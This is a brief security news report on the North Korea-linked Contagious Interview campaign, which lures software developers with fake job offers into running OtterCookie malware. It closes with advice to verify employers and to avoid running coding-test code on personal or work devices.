HQ/EMEAFind out how we can help your business
A group of alleged North Korean hackers is operating the Contagious Interview campaign, which targets software developers to infect them with a novel malware called OtterCookie.
Reports revealed that the malicious campaign has been active since at least December 2022. The campaign targets software developers with fake job offers to distribute malware strains in previous operations, such as BeaverTail and InvisibleFerret.
However, recent research showed that the Contagious Interview operation now uses a new strain, which was most likely launched in September.
The Contagious Interview campaign deploys the OtterCookie malware via loader.
According to investigations, the Contagious Interview campaign launches the newly uncovered OtterCookie malware through a loader that retrieves JSON data and runs the ‘cookie’ attribute in JavaScript code.
The researchers also noted that OtterCookie has been present in some situations since BeaverTail remains the most popular payload deployed by the campaign operators.
The loader infects targets using Node.js projects or npm packages acquired by hackers from GitHub or Bitbucket. However, files created as Qt or Electron programs have also been used recently.
Additional campaign assessment also showed that the attackers leveraged shell commands for data theft to harvest data, such as gathering Bitcoin wallet keys, documents, photos, and other valuable information. Also, the September version of OtterCookie already featured built-in capabilities for stealing cryptocurrency wallet keys.
Furthermore, the researchers disclosed that the checkForSensitiveData function used regular expressions to look for Ethereum private keys. Still, the threat actors modified them in the November malware variant, which now uses remote shell commands.
The most recent version of OtterCookie can also exfiltrate clipboard data to threat actors, which may contain sensitive data. Commands commonly used for reconnaissance, such as ‘ls’ and ‘cat’, were also discovered, indicating that the alleged North Korean hackers intend to examine the environment and prepare it for further breach or lateral movement.
The emergence of this new malware and the diversification of infection methods show that the threat actors behind the Contagious Interview campaign are trying alternative and novel tactics. Therefore, software developers should be wary of job offers by trying to verify information about possible employers.
Lastly, avoid running code on home or business devices as part of a job offer that includes coding exams.
